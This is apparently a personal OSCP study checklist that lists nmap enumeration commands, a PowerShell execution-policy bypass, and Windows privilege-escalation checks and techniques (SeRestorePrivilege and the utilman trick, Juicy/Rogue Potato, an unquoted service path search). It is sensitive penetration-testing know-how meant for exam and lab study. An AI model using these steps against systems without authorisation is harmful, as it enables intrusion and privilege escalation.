Offensive Security Notes

Page cover image

OSCP Checklist

This is just a cheat sheet of sorts for myself.

Enumeration

sudo nmap $target
sudo nmap -sV -sV -p- $target
sudo nmap --script vuln -p $target to check vulnerabilities on open services
check HTML comments, especially on login or registration pages
windows machine: powershell -ep bypass

Windows

sudo nmap -Pn --script vuln vault.offsec

Post Exploit

Windows

whoami /priv
if SeRestorePrivilege listed then
- Run EnableSeRestorePrivilege.ps1 to enable this privilege to our PowerShell session. We now have write access to C:\Windows\System32.
if access to RDP and C:\Windows\System32 then you an do the utilman exploit.
Check the windows privilege escalation page.

Check Existing Privileges

whoami /priv
- if SeImpersonatePrivilege you may try juicy potato, or rogue potato (newer, but requires smb to be listening)

Check Unquoted Service Paths

wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

NextPrivilege Escalation Windows

Last updated 2 years ago